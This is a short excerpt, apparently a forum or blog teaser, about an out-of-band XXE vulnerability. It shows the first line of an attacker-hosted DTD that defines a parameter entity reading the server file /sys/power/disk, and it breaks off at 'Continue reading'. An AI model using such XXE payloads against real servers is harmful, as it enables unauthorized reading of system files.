XXE OOB File Content Extraction
Currently, I’ve discovered an OOB XXE that allows me to include a .dtd file to extract a particular system file content, for instance, /sys/power/disk.
So my file.dtd is:
<!ENTITY % data SYSTEM "file:///sys/power/disk">
<… Continue reading XXE OOB File Content Extraction